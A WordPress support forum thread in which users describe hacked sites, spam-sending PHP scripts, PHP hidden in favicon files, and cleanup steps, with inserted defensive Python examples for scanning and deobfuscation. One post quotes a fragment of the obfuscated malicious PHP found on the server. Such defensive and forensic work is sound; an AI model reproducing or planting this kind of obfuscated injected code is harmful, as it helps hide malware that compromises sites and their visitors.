• I have the latest WP version and just had a malicious code injection.

    I wonder, how can that happen, and what can be done for future protection?

    On 2 domains some directories had been tampered with and had a brand new change date.

    They were on one domain:
    wp-content/themes/twentysixteen
    wp-content/themes/twentysixteen/template-parts

    The twentysixteen theme was installed, but another theme was active. It was updated to the latest version though (WP updates themes no matter whether they are active or not).

    The other domain:
    wp-includes/rest-api
    wp-content/plugins/wp-members/admin

    wp-members is a popular plugin that gets updated often?

    So how to prevent such malicious code injections? Or if they happen, how to notice them?

Viewing 14 replies - 1 through 14 (of 14 total)
  • During the development stage... Did you discourage search engines?
    When you were done developing the site…Did you install a Security plugin?

    Did you delete all the unused plugins?

    Thread Starter yellofish

    (@yellofish)

    I installed WP from a docker (shared hosting). I have no security plugin though, I just saw that there are such plugins.

    Is the website hacked or has a code? What's the website address?

    Thread Starter yellofish

    (@yellofish)

    Some more details. 2 sites got hacked. Both were 4.8.2 with all updates. One was just about 1 week old.

    They put a file called ssegtj.zip in the root directory.

    In it are

    /goren/ > 14 files
    /hopeir/ > 15 files
    .htaccess
    otiarw.php
    vrairue.php

    I wonder how they managed to get that on the site?

    In the meantime I installed the sucuri plugin and I hope that can help a little. Can’t it?

    Adam

    (@adamlachut)

    Sucuri in free version and other security plugins (like Wordfence) in free versions probably won’t help too much.

    You need to assume that it’s a compromised hosting account, not a single domain or directory, so IMHO you need to start with blocking access to this hosting account, change all credentials and clean it file by file. If you have more WP (or other CMSes) installed, you need to at least update all of them.

    Adam

    Thread Starter yellofish

    (@yellofish)

    Correct, Sucuri didn’t do anything. I got another malicious code injection.

    They install code and send SPAM from the infected domain.

    Any hints how to prevent that are appreciated.

    Thread Starter yellofish

    (@yellofish)

    I found favicon****.ico files that contained PHP code, that certainly can’t be right or?

    Also found 2 scripts the SPAM delivery identified as ‘sender’:

    /public_html/domain01.coms/wp-content/advanced-cache.php

    /public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php

    xackoaqb.php was a very new file, but advanced-cache.php was a few months old.

    What is best now? Completely delete and reinstall the domains?
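    As an added example, not code from anyone in this thread, here is a first-pass triage scan in Python for the symptoms described above (a PHP tag inside a favicon*.ico, a .php file dropped under wp-admin/js, and recently changed PHP files). The sample tree it builds is constructed, and the list of directories that ship no PHP is an assumption about a stock install.

```python
import os, tempfile, time
from pathlib import Path

# Assumption: stock WordPress ships no .php under these paths; icons/CSS/JS never start with a PHP tag.
NO_PHP_DIRS = ("wp-admin/js/", "wp-includes/js/", "wp-content/uploads/")
NON_PHP_EXT = {".ico", ".jpg", ".png", ".gif", ".css", ".js", ".txt"}

def contains_php_tag(path):
    with open(path, "rb") as f:
        head = f.read(65536)                  # dropped scripts are small
    return b"<?php" in head or b"<?=" in head

def scan_wordpress_tree(root, recent_days=7, now=None):
    """Return sorted (relative_path, reason) pairs that deserve a human look.
    mtime is only a hint: an intruder can reset it, so an old-looking file proves nothing."""
    root, now = Path(root), (time.time() if now is None else now)
    findings = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel, ext = p.relative_to(root).as_posix(), p.suffix.lower()
        if ext in NON_PHP_EXT and contains_php_tag(p):
            findings.append((rel, "php-tag-in-non-php-file"))
        if ext == ".php":
            if rel.startswith(NO_PHP_DIRS):
                findings.append((rel, "php-in-dir-that-ships-none"))
            if now - p.stat().st_mtime < recent_days * 86400:
                findings.append((rel, "recently-modified-php"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed fixture modelled on the paths mentioned in the thread."""
    files = {
        "wp-includes/version.php": "<?php $wp_version = '4.8.2';\n",
        "wp-content/advanced-cache.php": "<?php /* months-old drop-in */\n",
        "wp-admin/js/widgets/xackoaqb.php": "<?php /* stands in for the dropped file */\n",
        "favicon_abcd.ico": "<?php /* PHP hiding behind an .ico name */\n",
    }
    for rel, body in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    old = time.time() - 90 * 86400            # make two of the files look months old
    for rel in ("wp-includes/version.php", "wp-content/advanced-cache.php"):
        os.utime(Path(root, rel), (old, old))

def demo():
    root = tempfile.mkdtemp()                 # build the fixture, then scan it
    build_sample_tree(root)
    return scan_wordpress_tree(root)
```

    Run it against a real document root with scan_wordpress_tree("/path/to/public_html") and compare every hit against a clean copy of the same WordPress version before deleting anything.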

    Today I noticed many links in search results with otiarw.php in URLs and it seems that all of them redirect to malicious sites. I’ve searched Google for otiarw.php and there are 2,890,000 results. Root URLs of sites that I’ve randomly checked either work OK or fail with a PHP error. All that I’ve checked have a wp-admin page.

    Similar issue here (spam, malicious files and malicious code in themes’ header). WordPress was updated to the latest stable version but I can’t tell for sure whether the issue started after the update or prior to it, because some domains have older malicious files than the update, while on other domains the malicious files are newer than the update.
    For the moment we were not able to determine where the vulnerability is coming from but the code is doing a lot of things so I guess that completely deleting and reinstalling is a good start.

    Moderator t-p

    (@t-p)

    side note to @cvoicu,

    If the troubleshooting already discussed made no difference for you, then, as per the Forum Welcome, please post your own topic.

    @t-p I don’t think there’s a need to post my own topic, as I’ve basically replied to yellofish’s question about what he should do next. Thanks!

    Thread Starter yellofish

    (@yellofish)

    I deleted quite a lot of PHP files with base64 script in it. I can see plenty of hits looking for exactly those files from various IPs. I also installed Wordfence and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I am pretty OK for now.

    Another thing I did is renaming the /wp-content/ folder to something else. That will irritate the bots that look for certain plugins for a while (I hope).

    Below is just an idea of what one of those (non base64) looks like:

    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
    $GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];
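    An added example, not code from anyone in this thread: a small Python decoder for exactly this obfuscation style, where a hex-escaped alphabet is stored under a $GLOBALS key and every string is then spelled out as a chain of indexes into it. It takes the two lines quoted above as constructed input and assumes nothing beyond them; the PHP escape rules it applies are the standard double-quoted-string ones.

```python
import re

# Constructed sample: the two obfuscated statements quoted above, copied verbatim
# into a raw string so the PHP escape sequences survive unchanged.
SAMPLE = r'''<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
$GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];'''

def php_unescape(s):
    r"""Decode the escapes PHP honours in a double-quoted string: \xHH with one
    or two hex digits, plus the common single-letter ones. Anything else stays
    literal, which is why "\x47\x4c\x4fB\x41\x4c\x53" spells GLOBALS."""
    simple = {'n': '\n', 't': '\t', 'r': '\r', '\\': '\\', '"': '"', '$': '$'}
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return simple.get(m.group(2), '\\' + m.group(2))
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})|\\(.)', sub, s)

def deobfuscate(code):
    r"""Locate the alphabet statement, then rewrite every run of
    $GLOBALS['<key>'][i].$GLOBALS['<key>'][j]... into the literal it spells.
    Returns (key, alphabet, decoded_code); literals use Python-style quoting."""
    m = re.search(r"\$\{\"([^\"]*)\"\}\['(\w+)'\]\s*=\s*\"([^\"]*)\";", code)
    if not m:
        raise ValueError("no alphabet statement found")
    container, key = php_unescape(m.group(1)), m.group(2)
    alphabet = php_unescape(m.group(3))
    one = r"\$%s\['%s'\]\[\d+\]" % (re.escape(container), re.escape(key))
    run = r"%s(?:\s*\.\s*%s)*" % (one, one)
    def expand(match):
        idx = [int(i) for i in re.findall(r"\]\[(\d+)\]", match.group(0))]
        return repr("".join(alphabet[i] for i in idx))
    return key, alphabet, re.sub(run, expand, code)

if __name__ == "__main__":
    key, alphabet, decoded = deobfuscate(SAMPLE)
    print("alphabet key:", key, "(%d characters)" % len(alphabet))
    print(decoded.splitlines()[-1])   # -> $GLOBALS['m6e404'] = 'chr';
```

    The second statement turns out to store the function name chr under a fresh global, the usual first step before such a script builds the rest of its function names the same way; decoding the whole file this way shows what it actually calls without ever executing it.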

    Moderator t-p

    (@t-p)

    If you believe your site is hacked, carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Just came across similar issues. Found two users in the database with admin rights (one from three years ago) that weren’t supposed to be there.

  • The topic ‘malicious code inject’ is closed to new replies.